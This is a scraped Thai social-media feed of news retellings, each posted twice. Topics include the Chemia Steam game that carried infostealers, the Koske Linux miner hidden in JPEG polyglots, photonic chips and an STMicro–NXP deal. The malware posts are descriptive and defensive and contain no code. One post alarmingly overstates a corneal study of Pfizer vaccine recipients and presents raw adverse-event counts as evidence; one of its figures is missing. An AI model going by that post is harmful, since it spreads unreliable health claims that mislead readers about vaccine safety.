    Signal was one of the first apps to block Windows Recall from capturing screenshots of its interface, and more developers have since followed suit. This week, both...
    0 ความคิดเห็น 0 การแบ่งปัน 144 มุมมอง 0 รีวิว
  • เรื่องเล่าจากข่าว: เกมเอาชีวิตรอดที่ “ขโมยชีวิตดิจิทัล” ของคุณ

    ลองจินตนาการว่าคุณโหลดเกมเอาชีวิตรอดชื่อ Chemia จาก Steam เพื่อเล่นในช่วง Early Access แต่แทนที่จะได้สนุกกับการสร้างฐานและฝ่าฟันภัยพิบัติ คุณกลับโดนขโมยข้อมูลส่วนตัวและคริปโตแบบไม่รู้ตัว — นี่คือสิ่งที่เกิดขึ้นจริง!

    บริษัทความปลอดภัยไซเบอร์ Prodaft เปิดเผยว่าเกม Chemia ถูกฝังมัลแวร์ 3 สายพันธุ์ ได้แก่:
    - Fickle Stealer: ขโมยข้อมูลจากเบราว์เซอร์, password manager และ crypto wallet
    - Vidar Stealer: มัลแวร์แบบบริการ (Malware-as-a-Service) ที่เชื่อมต่อผ่านโซเชียลมีเดีย
    - HijackLoader: ตัวโหลดมัลแวร์ที่สามารถติดตั้งภัยคุกคามอื่นในอนาคต

    เกมนี้ถูกแจกผ่านระบบ Playtest ของ Steam ซึ่งต้องขอสิทธิ์เข้าถึงก่อนเล่น ทำให้ดูเหมือนปลอดภัย แต่จริง ๆ แล้วเป็นช่องทางที่แฮกเกอร์ใช้หลบเลี่ยงการตรวจสอบของแพลตฟอร์ม

    เกม Chemia ถูกใช้เป็นช่องทางแพร่มัลแวร์
    ฝังมัลแวร์ 3 ชนิด: Fickle Stealer, Vidar Stealer, HijackLoader
    มัลแวร์ทำงานเมื่อผู้ใช้เปิดเกม โดยรันควบคู่กับแอปพลิเคชันจริง

    มัลแวร์แต่ละตัวมีหน้าที่เฉพาะ
    Fickle Stealer: ใช้ PowerShell ขโมยข้อมูลระบบและไฟล์สำคัญ
    Vidar Stealer: เชื่อมต่อผ่านโซเชียลมีเดียเพื่อส่งข้อมูล
    HijackLoader: ใช้ติดตั้งมัลแวร์อื่นในอนาคต

    เกมถูกแจกผ่านระบบ Playtest ของ Steam
    ต้องขอสิทธิ์ก่อนเล่น ทำให้ดูเหมือนปลอดภัย
    ไม่มีรีวิวหรือข้อมูลจากนักพัฒนาอื่น ทำให้ตรวจสอบยาก

    นักพัฒนา Aether Forge Studios ไม่มีตัวตนชัดเจน
    ไม่มีเว็บไซต์หรือโซเชียลมีเดียที่เชื่อมโยงกับเกม
    อาจเป็นบัญชีปลอมที่ใช้หลอกลวงผู้ใช้

    Prodaft เผยว่าแฮกเกอร์ชื่อ EncryptHub อยู่เบื้องหลัง
    เคยมีประวัติการโจมตีแบบ spear-phishing ตั้งแต่ปี 2024
    แชร์ Indicators of Compromise (IOCs) บน GitHub เพื่อช่วยตรวจสอบ

    เกมบนแพลตฟอร์มที่เชื่อถือได้ก็อาจไม่ปลอดภัย
    Steam ไม่สามารถตรวจสอบมัลแวร์ในทุกเกมได้ทันที
    ผู้ใช้มักเชื่อว่าการโหลดจาก Steam คือ “ปลอดภัยโดยอัตโนมัติ”

    มัลแวร์สามารถขโมยข้อมูลสำคัญได้ทันทีที่เปิดเกม
    ข้อมูลที่ถูกขโมยรวมถึงรหัสผ่าน, session token, และ crypto wallet
    อาจนำไปสู่การสูญเสียทางการเงินและการขโมยตัวตน

    ระบบ Early Access และ Playtest อาจถูกใช้เป็นช่องทางโจมตี
    เกมที่ยังไม่เปิดตัวเต็มรูปแบบอาจไม่มีการตรวจสอบเข้มงวด
    แฮกเกอร์ใช้ช่องโหว่นี้ในการฝังโค้ดอันตราย

    ผู้ใช้ที่เคยเล่น Chemia ควรตรวจสอบระบบทันที
    ลบเกมออกจากเครื่อง
    สแกนมัลแวร์เต็มระบบ
    เปลี่ยนรหัสผ่านทุกบัญชีที่เคยล็อกอินระหว่างเล่นเกม

    https://www.tomshardware.com/tech-industry/cyber-security/hacker-plants-three-strains-of-malware-in-a-steam-early-access-game-called-chemia-security-company-found-crypto-jacking-infostealers-and-a-backdoor-to-install-yet-more-malware-in-the-future
    🧠 เรื่องเล่าจากข่าว: เกมเอาชีวิตรอดที่ “ขโมยชีวิตดิจิทัล” ของคุณ ลองจินตนาการว่าคุณโหลดเกมเอาชีวิตรอดชื่อ Chemia จาก Steam เพื่อเล่นในช่วง Early Access แต่แทนที่จะได้สนุกกับการสร้างฐานและฝ่าฟันภัยพิบัติ คุณกลับโดนขโมยข้อมูลส่วนตัวและคริปโตแบบไม่รู้ตัว — นี่คือสิ่งที่เกิดขึ้นจริง! บริษัทความปลอดภัยไซเบอร์ Prodaft เปิดเผยว่าเกม Chemia ถูกฝังมัลแวร์ 3 สายพันธุ์ ได้แก่: - Fickle Stealer: ขโมยข้อมูลจากเบราว์เซอร์, password manager และ crypto wallet - Vidar Stealer: มัลแวร์แบบบริการ (Malware-as-a-Service) ที่เชื่อมต่อผ่านโซเชียลมีเดีย - HijackLoader: ตัวโหลดมัลแวร์ที่สามารถติดตั้งภัยคุกคามอื่นในอนาคต เกมนี้ถูกแจกผ่านระบบ Playtest ของ Steam ซึ่งต้องขอสิทธิ์เข้าถึงก่อนเล่น ทำให้ดูเหมือนปลอดภัย แต่จริง ๆ แล้วเป็นช่องทางที่แฮกเกอร์ใช้หลบเลี่ยงการตรวจสอบของแพลตฟอร์ม ✅ เกม Chemia ถูกใช้เป็นช่องทางแพร่มัลแวร์ ➡️ ฝังมัลแวร์ 3 ชนิด: Fickle Stealer, Vidar Stealer, HijackLoader ➡️ มัลแวร์ทำงานเมื่อผู้ใช้เปิดเกม โดยรันควบคู่กับแอปพลิเคชันจริง ✅ มัลแวร์แต่ละตัวมีหน้าที่เฉพาะ ➡️ Fickle Stealer: ใช้ PowerShell ขโมยข้อมูลระบบและไฟล์สำคัญ ➡️ Vidar Stealer: เชื่อมต่อผ่านโซเชียลมีเดียเพื่อส่งข้อมูล ➡️ HijackLoader: ใช้ติดตั้งมัลแวร์อื่นในอนาคต ✅ เกมถูกแจกผ่านระบบ Playtest ของ Steam ➡️ ต้องขอสิทธิ์ก่อนเล่น ทำให้ดูเหมือนปลอดภัย ➡️ ไม่มีรีวิวหรือข้อมูลจากนักพัฒนาอื่น ทำให้ตรวจสอบยาก ✅ นักพัฒนา Aether Forge Studios ไม่มีตัวตนชัดเจน ➡️ ไม่มีเว็บไซต์หรือโซเชียลมีเดียที่เชื่อมโยงกับเกม ➡️ อาจเป็นบัญชีปลอมที่ใช้หลอกลวงผู้ใช้ ✅ Prodaft เผยว่าแฮกเกอร์ชื่อ EncryptHub อยู่เบื้องหลัง ➡️ เคยมีประวัติการโจมตีแบบ spear-phishing ตั้งแต่ปี 2024 ➡️ แชร์ Indicators of Compromise (IOCs) บน GitHub เพื่อช่วยตรวจสอบ ‼️ เกมบนแพลตฟอร์มที่เชื่อถือได้ก็อาจไม่ปลอดภัย ⛔ Steam ไม่สามารถตรวจสอบมัลแวร์ในทุกเกมได้ทันที ⛔ ผู้ใช้มักเชื่อว่าการโหลดจาก Steam คือ “ปลอดภัยโดยอัตโนมัติ” ‼️ มัลแวร์สามารถขโมยข้อมูลสำคัญได้ทันทีที่เปิดเกม ⛔ ข้อมูลที่ถูกขโมยรวมถึงรหัสผ่าน, session token, และ crypto wallet ⛔ อาจนำไปสู่การสูญเสียทางการเงินและการขโมยตัวตน ‼️ ระบบ Early Access และ Playtest อาจถูกใช้เป็นช่องทางโจมตี ⛔ เกมที่ยังไม่เปิดตัวเต็มรูปแบบอาจไม่มีการตรวจสอบเข้มงวด ⛔ แฮกเกอร์ใช้ช่องโหว่นี้ในการฝังโค้ดอันตราย ‼️ ผู้ใช้ที่เคยเล่น Chemia ควรตรวจสอบระบบทันที ⛔ ลบเกมออกจากเครื่อง ⛔ สแกนมัลแวร์เต็มระบบ ⛔ เปลี่ยนรหัสผ่านทุกบัญชีที่เคยล็อกอินระหว่างเล่นเกม https://www.tomshardware.com/tech-industry/cyber-security/hacker-plants-three-strains-of-malware-in-a-steam-early-access-game-called-chemia-security-company-found-crypto-jacking-infostealers-and-a-backdoor-to-install-yet-more-malware-in-the-future
    0 ความคิดเห็น 0 การแบ่งปัน 188 มุมมอง 0 รีวิว
  • เรื่องเล่าจากข่าว: “แพนด้าน่ารัก” ที่แอบขุดคริปโตในเครื่องคุณ

    ลองจินตนาการว่าคุณเปิดภาพแพนด้าน่ารักจากเว็บแชร์รูปภาพ แล้วเบื้องหลังภาพนั้นกลับมีมัลแวร์ที่กำลังใช้ CPU และ GPU ของคุณขุดคริปโตอยู่เงียบ ๆ — นี่คือสิ่งที่เกิดขึ้นจริงกับมัลแวร์ตัวใหม่ชื่อว่า Koske

    Koske เป็นมัลแวร์บน Linux ที่ใช้เทคนิค “polyglot file” คือไฟล์ที่สามารถเป็นได้ทั้งภาพและโค้ดในเวลาเดียวกัน โดยแฮกเกอร์จะฝัง shell script และโค้ด C สำหรับ rootkit ไว้ท้ายไฟล์ JPEG ที่ดูเหมือนภาพแพนด้าธรรมดา เมื่อเปิดด้วยโปรแกรม interpreter มันจะรันโค้ดในหน่วยความจำทันที โดยไม่ทิ้งร่องรอยบนดิสก์

    เป้าหมายของ Koske คือการขุดคริปโตมากกว่า 18 สกุล เช่น Monero, Ravencoin, Nexa และ Zano โดยเลือกใช้ miner ที่เหมาะกับฮาร์ดแวร์ของเหยื่อ ไม่ว่าจะเป็น CPU หรือ GPU และสามารถสลับเหรียญหรือพูลได้อัตโนมัติหากมีปัญหา

    ที่น่ากลัวคือ Koske แสดงพฤติกรรมที่ “คล้าย AI” เช่น การตรวจสอบการเชื่อมต่อ GitHub หลายชั้น การแก้ไข DNS และ proxy อัตโนมัติ และการค้นหา proxy ที่ใช้งานได้จาก GitHub — ทั้งหมดนี้ชี้ว่าอาจมีการใช้ LLM หรือระบบอัตโนมัติช่วยพัฒนาโค้ด

    Koske เป็นมัลแวร์ Linux ที่ใช้ภาพแพนด้าเป็นตัวหลอก
    ใช้เทคนิค polyglot file ฝังโค้ดไว้ท้ายไฟล์ JPEG
    เมื่อเปิดด้วย interpreter จะรันโค้ดในหน่วยความจำทันที

    เป้าหมายหลักคือการขุดคริปโต
    รองรับมากกว่า 18 สกุล เช่น Monero, Ravencoin, Nexa, Zano
    เลือก miner ตามฮาร์ดแวร์ของเหยื่อ (CPU/GPU)
    สลับพูลหรือเหรียญอัตโนมัติหากมีปัญหา

    ใช้ภาพจากเว็บแชร์รูปภาพที่ถูกต้องตามกฎหมาย
    เช่น OVH images, freeimage, postimage
    ทำให้หลบเลี่ยงการตรวจจับได้ง่าย

    แสดงพฤติกรรมคล้าย AI ในการปรับตัว
    ตรวจสอบการเชื่อมต่อ GitHub ด้วย curl, wget, TCP
    รีเซ็ต proxy, flush iptables, เปลี่ยน DNS เป็น Cloudflare/Google
    ค้นหา proxy ที่ใช้งานได้จาก GitHub lists

    พบร่องรอยของต้นทางจากเซอร์เบียและสโลวัก
    IP จากเซอร์เบีย, สคริปต์มีคำเซอร์เบีย, GitHub repo ใช้ภาษาสโลวัก
    ชื่อ “Koske” อาจมาจากคำว่า “กระดูก” ในภาษาท้องถิ่น

    นักวิจัยเชื่อว่าโค้ดถูกช่วยเขียนโดย AI
    โค้ดมีโครงสร้างดี ความเห็นชัดเจน และใช้เทคนิคป้องกันตัวเอง
    ทำให้การวิเคราะห์และระบุผู้เขียนยากขึ้น

    มัลแวร์ Koske สามารถหลบเลี่ยงการตรวจจับได้อย่างมีประสิทธิภาพ
    รันในหน่วยความจำโดยไม่เขียนลงดิสก์
    ใช้ rootkit ซ่อน process และไฟล์จากเครื่องมือทั่วไป

    การเปิดภาพจากแหล่งที่ไม่น่าเชื่อถืออาจเป็นช่องทางติดมัลแวร์
    ภาพที่ดู “น่ารัก” อาจมีโค้ดอันตรายซ่อนอยู่
    ไม่ควรเปิดไฟล์จาก URL ที่ไม่รู้จักผ่าน interpreter หรือ shell

    มัลแวร์นี้ใช้ทรัพยากรเครื่องอย่างหนัก
    ทำให้ค่าไฟและค่า cloud compute สูงขึ้นโดยไม่รู้ตัว
    ส่งผลต่อประสิทธิภาพของระบบและความปลอดภัย

    เป็นตัวอย่างของภัยคุกคามยุคใหม่ที่ใช้ AI เป็นเครื่องมือ
    การใช้ LLM ในการสร้างมัลแวร์ทำให้มันปรับตัวได้ดีขึ้น
    อาจเป็นจุดเริ่มต้นของมัลแวร์ที่ “เรียนรู้” และ “ปรับตัว” ได้แบบเรียลไทม์

    https://www.techradar.com/pro/security/a-damaging-new-linux-malware-is-hiding-in-cute-animal-photos
    🧠 เรื่องเล่าจากข่าว: “แพนด้าน่ารัก” ที่แอบขุดคริปโตในเครื่องคุณ ลองจินตนาการว่าคุณเปิดภาพแพนด้าน่ารักจากเว็บแชร์รูปภาพ แล้วเบื้องหลังภาพนั้นกลับมีมัลแวร์ที่กำลังใช้ CPU และ GPU ของคุณขุดคริปโตอยู่เงียบ ๆ — นี่คือสิ่งที่เกิดขึ้นจริงกับมัลแวร์ตัวใหม่ชื่อว่า Koske Koske เป็นมัลแวร์บน Linux ที่ใช้เทคนิค “polyglot file” คือไฟล์ที่สามารถเป็นได้ทั้งภาพและโค้ดในเวลาเดียวกัน โดยแฮกเกอร์จะฝัง shell script และโค้ด C สำหรับ rootkit ไว้ท้ายไฟล์ JPEG ที่ดูเหมือนภาพแพนด้าธรรมดา เมื่อเปิดด้วยโปรแกรม interpreter มันจะรันโค้ดในหน่วยความจำทันที โดยไม่ทิ้งร่องรอยบนดิสก์ เป้าหมายของ Koske คือการขุดคริปโตมากกว่า 18 สกุล เช่น Monero, Ravencoin, Nexa และ Zano โดยเลือกใช้ miner ที่เหมาะกับฮาร์ดแวร์ของเหยื่อ ไม่ว่าจะเป็น CPU หรือ GPU และสามารถสลับเหรียญหรือพูลได้อัตโนมัติหากมีปัญหา ที่น่ากลัวคือ Koske แสดงพฤติกรรมที่ “คล้าย AI” เช่น การตรวจสอบการเชื่อมต่อ GitHub หลายชั้น การแก้ไข DNS และ proxy อัตโนมัติ และการค้นหา proxy ที่ใช้งานได้จาก GitHub — ทั้งหมดนี้ชี้ว่าอาจมีการใช้ LLM หรือระบบอัตโนมัติช่วยพัฒนาโค้ด ✅ Koske เป็นมัลแวร์ Linux ที่ใช้ภาพแพนด้าเป็นตัวหลอก ➡️ ใช้เทคนิค polyglot file ฝังโค้ดไว้ท้ายไฟล์ JPEG ➡️ เมื่อเปิดด้วย interpreter จะรันโค้ดในหน่วยความจำทันที ✅ เป้าหมายหลักคือการขุดคริปโต ➡️ รองรับมากกว่า 18 สกุล เช่น Monero, Ravencoin, Nexa, Zano ➡️ เลือก miner ตามฮาร์ดแวร์ของเหยื่อ (CPU/GPU) ➡️ สลับพูลหรือเหรียญอัตโนมัติหากมีปัญหา ✅ ใช้ภาพจากเว็บแชร์รูปภาพที่ถูกต้องตามกฎหมาย ➡️ เช่น OVH images, freeimage, postimage ➡️ ทำให้หลบเลี่ยงการตรวจจับได้ง่าย ✅ แสดงพฤติกรรมคล้าย AI ในการปรับตัว ➡️ ตรวจสอบการเชื่อมต่อ GitHub ด้วย curl, wget, TCP ➡️ รีเซ็ต proxy, flush iptables, เปลี่ยน DNS เป็น Cloudflare/Google ➡️ ค้นหา proxy ที่ใช้งานได้จาก GitHub lists ✅ พบร่องรอยของต้นทางจากเซอร์เบียและสโลวัก ➡️ IP จากเซอร์เบีย, สคริปต์มีคำเซอร์เบีย, GitHub repo ใช้ภาษาสโลวัก ➡️ ชื่อ “Koske” อาจมาจากคำว่า “กระดูก” ในภาษาท้องถิ่น ✅ นักวิจัยเชื่อว่าโค้ดถูกช่วยเขียนโดย AI ➡️ โค้ดมีโครงสร้างดี ความเห็นชัดเจน และใช้เทคนิคป้องกันตัวเอง ➡️ ทำให้การวิเคราะห์และระบุผู้เขียนยากขึ้น ‼️ มัลแวร์ Koske สามารถหลบเลี่ยงการตรวจจับได้อย่างมีประสิทธิภาพ ⛔ รันในหน่วยความจำโดยไม่เขียนลงดิสก์ ⛔ ใช้ rootkit ซ่อน process และไฟล์จากเครื่องมือทั่วไป ‼️ การเปิดภาพจากแหล่งที่ไม่น่าเชื่อถืออาจเป็นช่องทางติดมัลแวร์ ⛔ ภาพที่ดู “น่ารัก” อาจมีโค้ดอันตรายซ่อนอยู่ ⛔ ไม่ควรเปิดไฟล์จาก URL ที่ไม่รู้จักผ่าน interpreter หรือ shell ‼️ มัลแวร์นี้ใช้ทรัพยากรเครื่องอย่างหนัก ⛔ ทำให้ค่าไฟและค่า cloud compute สูงขึ้นโดยไม่รู้ตัว ⛔ ส่งผลต่อประสิทธิภาพของระบบและความปลอดภัย ‼️ เป็นตัวอย่างของภัยคุกคามยุคใหม่ที่ใช้ AI เป็นเครื่องมือ ⛔ การใช้ LLM ในการสร้างมัลแวร์ทำให้มันปรับตัวได้ดีขึ้น ⛔ อาจเป็นจุดเริ่มต้นของมัลแวร์ที่ “เรียนรู้” และ “ปรับตัว” ได้แบบเรียลไทม์ https://www.techradar.com/pro/security/a-damaging-new-linux-malware-is-hiding-in-cute-animal-photos
    0 ความคิดเห็น 0 การแบ่งปัน 181 มุมมอง 0 รีวิว
  • การศึกษาใหม่ - การเปลี่ยนแปลงที่ไม่พึงประสงค์ของกระจกตาหลังการฉีดวัคซีนโควิด-19 mRNA ของไฟเซอร์ 2 โดส...
    นักวิจัยชาวตุรกีเพิ่งตีพิมพ์ผลการศึกษาใหม่ ซึ่งได้ตรวจสอบดวงตาของอาสาสมัครหนุ่มสาวสุขภาพดี 64 คน (128 ดวง) ก่อนฉีดวัคซีน mRNA ของไฟเซอร์ และอีกครั้งหลังจากฉีดวัคซีนเข็มที่สองไปแล้ว 75 วัน
    พวกเขาค้นพบการเปลี่ยนแปลงที่สำคัญของเยื่อบุผนังกระจกตา (เซลล์ที่ไม่สามารถสร้างใหม่ได้)
    การเปลี่ยนแปลงโดยเฉลี่ยมีดังนี้: *ความหนาแน่นของเซลล์เยื่อบุผนังกระจกตาลดลง 8.4%
    *ความแปรปรวนของเซลล์เพิ่มขึ้น 39-42% ซึ่งบ่งชี้ถึงความเครียดของเซลล์และการสูญเสียความสม่ำเสมอของเซลล์
    *รูปร่างหกเหลี่ยมลดลง 48-50% ซึ่งบ่งชี้ถึงการสูญเสียรูปร่างปกติและสัญญาณของความผิดปกติ
    *ความหนาของกระจกตาส่วนกลางเพิ่มขึ้นจาก 533 ไมโครเมตร เป็นไมโครเมตร
    บ่งชี้ถึงอาการบวมและความไม่สมดุลของน้ำในกระจกตา ความเสียหายของเยื่อบุผนังกระจกตาถือเป็นความเสียหายถาวรและไม่สามารถกลับคืนสู่สภาพเดิมได้
    ความเสียหายของกระจกตาที่ยั่งยืนอาจทำให้เกิดอาการมองเห็นพร่ามัว กระจกตาบวมเรื้อรัง หรือแม้กระทั่งตาบอด

    ฐานข้อมูลความปลอดภัยทางเภสัชกรรมของ Medsafe นิวซีแลนด์ได้รับรายงานต่อไปนี้สำหรับผู้ที่ได้รับ mRNA ของ Pfizer:

    อาการไม่พึงประสงค์ที่ดวงตา 4,151 รายการ
    รวมถึง... ตาบอดถาวร 4 รายการ
    ตาบอดชั่วคราว 4 รายการ
    ความบกพร่องทางการมองเห็น 167 รายการ
    การมองเห็นพร่ามัว 2,950 รายการ
    https://www.tandfonline.com/doi/10.1080/09286586.2025.2522724?fbclid=IwY2xjawLt6DhleHRuA2FlbQIxMABicmlkETFNcjAwcjBYUkhQTjZHdTNOAR4U-3ccvgLmKrdl2z5T54hx7q_hHeIdrtgR5fhprckSJa2Yu6Ki-4QEGeU91w_aem_vqKwKDtVD9r6HJFCP82X_g#abstract
    🆘การศึกษาใหม่ - การเปลี่ยนแปลงที่ไม่พึงประสงค์ของกระจกตาหลังการฉีดวัคซีนโควิด-19 mRNA ของไฟเซอร์ 2 โดส... 📌นักวิจัยชาวตุรกีเพิ่งตีพิมพ์ผลการศึกษาใหม่ ซึ่งได้ตรวจสอบดวงตาของอาสาสมัครหนุ่มสาวสุขภาพดี 64 คน (128 ดวง) ก่อนฉีดวัคซีน mRNA ของไฟเซอร์ และอีกครั้งหลังจากฉีดวัคซีนเข็มที่สองไปแล้ว 75 วัน ‼️พวกเขาค้นพบการเปลี่ยนแปลงที่สำคัญของเยื่อบุผนังกระจกตา (เซลล์ที่ไม่สามารถสร้างใหม่ได้) 😨การเปลี่ยนแปลงโดยเฉลี่ยมีดังนี้: *ความหนาแน่นของเซลล์เยื่อบุผนังกระจกตาลดลง 8.4% *ความแปรปรวนของเซลล์เพิ่มขึ้น 39-42% ซึ่งบ่งชี้ถึงความเครียดของเซลล์และการสูญเสียความสม่ำเสมอของเซลล์ *รูปร่างหกเหลี่ยมลดลง 48-50% ซึ่งบ่งชี้ถึงการสูญเสียรูปร่างปกติและสัญญาณของความผิดปกติ *ความหนาของกระจกตาส่วนกลางเพิ่มขึ้นจาก 533 ไมโครเมตร เป็นไมโครเมตร ‼️บ่งชี้ถึงอาการบวมและความไม่สมดุลของน้ำในกระจกตา ความเสียหายของเยื่อบุผนังกระจกตาถือเป็นความเสียหายถาวรและไม่สามารถกลับคืนสู่สภาพเดิมได้ 😨ความเสียหายของกระจกตาที่ยั่งยืนอาจทำให้เกิดอาการมองเห็นพร่ามัว กระจกตาบวมเรื้อรัง หรือแม้กระทั่งตาบอด 🧨ฐานข้อมูลความปลอดภัยทางเภสัชกรรมของ Medsafe นิวซีแลนด์ได้รับรายงานต่อไปนี้สำหรับผู้ที่ได้รับ mRNA ของ Pfizer: อาการไม่พึงประสงค์ที่ดวงตา 4,151 รายการ รวมถึง... ตาบอดถาวร 4 รายการ ตาบอดชั่วคราว 4 รายการ ความบกพร่องทางการมองเห็น 167 รายการ การมองเห็นพร่ามัว 2,950 รายการ https://www.tandfonline.com/doi/10.1080/09286586.2025.2522724?fbclid=IwY2xjawLt6DhleHRuA2FlbQIxMABicmlkETFNcjAwcjBYUkhQTjZHdTNOAR4U-3ccvgLmKrdl2z5T54hx7q_hHeIdrtgR5fhprckSJa2Yu6Ki-4QEGeU91w_aem_vqKwKDtVD9r6HJFCP82X_g#abstract
    0 ความคิดเห็น 0 การแบ่งปัน 207 มุมมอง 0 รีวิว
  • นักวิเคราะห์ดาวเทียมออสเตรเลียชี้หลักฐานชัด! กัมพูชาเริ่มขัดแย้ง-เสริมกำลังก่อนปะทะ
    https://www.thai-tai.tv/news/20534/
    .
    #ข้อมูลดาวเทียม #นาธานรูเซอร์ #ASPI #กัมพูชาเริ่มก่อน #ชายแดนไทยกัมพูชา #หลักฐานชัด #ความขัดแย้ง #สงคราม #อุดรมีชัย #พระวิหาร
    นักวิเคราะห์ดาวเทียมออสเตรเลียชี้หลักฐานชัด! กัมพูชาเริ่มขัดแย้ง-เสริมกำลังก่อนปะทะ https://www.thai-tai.tv/news/20534/ . #ข้อมูลดาวเทียม #นาธานรูเซอร์ #ASPI #กัมพูชาเริ่มก่อน #ชายแดนไทยกัมพูชา #หลักฐานชัด #ความขัดแย้ง #สงคราม #อุดรมีชัย #พระวิหาร
    0 ความคิดเห็น 0 การแบ่งปัน 113 มุมมอง 0 รีวิว
  • เรื่องเล่าจากโลกเลเซอร์: เมื่อแสงกลายเป็นทางลัดของข้อมูล

    TechRadar รายงานความก้าวหน้าครั้งสำคัญในการพัฒนา “ชิปโฟโตนิกส์” ที่ใช้เลเซอร์ควอนตัมดอท (Quantum Dot Lasers) ซึ่งสามารถทำงานบนซิลิคอนได้โดยตรง โดยไม่ต้องออกแบบระบบใหม่ทั้งหมด และยังทนความร้อนได้ดีเยี่ยม เหมาะกับการใช้งานจริงในศูนย์ข้อมูลและอุปกรณ์อัจฉริยะในอนาคต

    ลองจินตนาการว่าในอนาคต ชิปที่อยู่ในสมาร์ทโฟนหรือโน้ตบุ๊กของคุณจะไม่ส่งข้อมูลด้วยไฟฟ้า แต่ใช้ “แสง” แทน ซึ่งเร็วกว่าและประหยัดพลังงานมากกว่า แต่ปัญหาคือการรวมเลเซอร์เข้ากับซิลิคอนนั้นยากมาก เพราะวัสดุไม่เข้ากัน

    ทีมนักวิจัยจากมหาวิทยาลัยแคลิฟอร์เนีย นำโดย Rosalyn Koscica ได้แก้ปัญหานี้ด้วย 3 กลยุทธ์:

    1️⃣ ใช้การเติบโตแบบสองขั้นตอน (MOCVD + MBE) เพื่อสร้างเลเซอร์ควอนตัมดอทบนซิลิคอน

    2️⃣ เติมช่องว่างด้วยโพลิเมอร์เพื่อลดการกระจายของแสง

    3️⃣ ใช้การออกแบบเลเซอร์แบบ pocket laser ที่เล็กและแม่นยำ

    ผลลัพธ์คือเลเซอร์ที่ทำงานได้ในช่วง O-band (เหมาะกับการสื่อสารข้อมูล) ทนความร้อนได้ถึง 105°C และมีอายุการใช้งานกว่า 6 ปี โดยไม่ต้องใช้ระบบระบายความร้อนที่ซับซ้อน

    ที่สำคัญคือกระบวนการนี้สามารถผลิตในโรงงานเซมิคอนดักเตอร์ทั่วไปได้เลย ไม่ต้องเปลี่ยนโครงสร้างชิป ทำให้มีโอกาสผลิตในระดับอุตสาหกรรมได้ง่ายขึ้น

    https://www.techradar.com/pro/a-new-trick-for-merging-lasers-with-silicon-could-finally-make-photonic-chips-cheap-fast-and-ready-for-mass-production
    🎙️ เรื่องเล่าจากโลกเลเซอร์: เมื่อแสงกลายเป็นทางลัดของข้อมูล TechRadar รายงานความก้าวหน้าครั้งสำคัญในการพัฒนา “ชิปโฟโตนิกส์” ที่ใช้เลเซอร์ควอนตัมดอท (Quantum Dot Lasers) ซึ่งสามารถทำงานบนซิลิคอนได้โดยตรง โดยไม่ต้องออกแบบระบบใหม่ทั้งหมด และยังทนความร้อนได้ดีเยี่ยม เหมาะกับการใช้งานจริงในศูนย์ข้อมูลและอุปกรณ์อัจฉริยะในอนาคต ลองจินตนาการว่าในอนาคต ชิปที่อยู่ในสมาร์ทโฟนหรือโน้ตบุ๊กของคุณจะไม่ส่งข้อมูลด้วยไฟฟ้า แต่ใช้ “แสง” แทน ซึ่งเร็วกว่าและประหยัดพลังงานมากกว่า แต่ปัญหาคือการรวมเลเซอร์เข้ากับซิลิคอนนั้นยากมาก เพราะวัสดุไม่เข้ากัน ทีมนักวิจัยจากมหาวิทยาลัยแคลิฟอร์เนีย นำโดย Rosalyn Koscica ได้แก้ปัญหานี้ด้วย 3 กลยุทธ์: 1️⃣ ใช้การเติบโตแบบสองขั้นตอน (MOCVD + MBE) เพื่อสร้างเลเซอร์ควอนตัมดอทบนซิลิคอน 2️⃣ เติมช่องว่างด้วยโพลิเมอร์เพื่อลดการกระจายของแสง 3️⃣ ใช้การออกแบบเลเซอร์แบบ pocket laser ที่เล็กและแม่นยำ ผลลัพธ์คือเลเซอร์ที่ทำงานได้ในช่วง O-band (เหมาะกับการสื่อสารข้อมูล) ทนความร้อนได้ถึง 105°C และมีอายุการใช้งานกว่า 6 ปี โดยไม่ต้องใช้ระบบระบายความร้อนที่ซับซ้อน ที่สำคัญคือกระบวนการนี้สามารถผลิตในโรงงานเซมิคอนดักเตอร์ทั่วไปได้เลย ไม่ต้องเปลี่ยนโครงสร้างชิป ทำให้มีโอกาสผลิตในระดับอุตสาหกรรมได้ง่ายขึ้น https://www.techradar.com/pro/a-new-trick-for-merging-lasers-with-silicon-could-finally-make-photonic-chips-cheap-fast-and-ready-for-mass-production
    0 ความคิดเห็น 0 การแบ่งปัน 166 มุมมอง 0 รีวิว
  • เรื่องเล่าจากโลกเซมิคอนดักเตอร์: เมื่อ STMicro ขยายอาณาจักรด้วยเซนเซอร์จาก NXP

    ในยุคที่ตลาดชิปสำหรับยานยนต์และอุตสาหกรรมกำลังชะลอตัว STMicroelectronics กลับเดินเกมรุกด้วยการเข้าซื้อกิจการบางส่วนของ NXP Semiconductors ซึ่งเน้นด้าน MEMS-based electromechanical sensors เช่น:
    - เซนเซอร์ความปลอดภัยและการตรวจสอบสำหรับรถยนต์
    - เซนเซอร์วัดแรงดันสำหรับระบบอุตสาหกรรม

    ดีลนี้มีรายละเอียดดังนี้:
    - จ่ายเงินสดล่วงหน้า 900 ล้านดอลลาร์
    - จ่ายเพิ่มอีก 50 ล้านดอลลาร์ เมื่อบรรลุเป้าหมายทางเทคนิคบางประการ
    - ธุรกิจเซนเซอร์ของ NXP ที่ขายให้ STMicro มีรายได้ประมาณ 300 ล้านดอลลาร์ในปีที่ผ่านมา
    - คาดว่าการซื้อขายจะเสร็จสิ้นในครึ่งแรกของปี 2026

    อย่างไรก็ตาม STMicro เพิ่งรายงานผลประกอบการขาดทุนไตรมาสแรกในรอบกว่า 10 ปี โดยมีค่าใช้จ่ายจากการปรับโครงสร้างและการด้อยค่าทรัพย์สินถึง 190 ล้านดอลลาร์

    STMicroelectronics จะซื้อกิจการบางส่วนของธุรกิจเซนเซอร์จาก NXP
    มูลค่ารวมสูงสุดถึง 950 ล้านดอลลาร์สหรัฐ

    ดีลนี้เน้นเซนเซอร์แบบ MEMS สำหรับยานยนต์และอุตสาหกรรม
    เช่น เซนเซอร์ความปลอดภัยและเซนเซอร์วัดแรงดัน

    STMicro จะจ่ายเงินสดล่วงหน้า 900 ล้านดอลลาร์
    และอีก 50 ล้านดอลลาร์เมื่อบรรลุเป้าหมายทางเทคนิค

    ธุรกิจเซนเซอร์ของ NXP มีรายได้ประมาณ 300 ล้านดอลลาร์ในปีที่ผ่านมา
    เป็นธุรกิจที่มีศักยภาพแม้ตลาดชิปโดยรวมจะชะลอตัว

    การซื้อกิจการคาดว่าจะเสร็จสิ้นในครึ่งแรกของปี 2026
    อยู่ระหว่างการดำเนินการและตรวจสอบ

    STMicro รายงานผลขาดทุนไตรมาสแรกในรอบกว่า 10 ปี
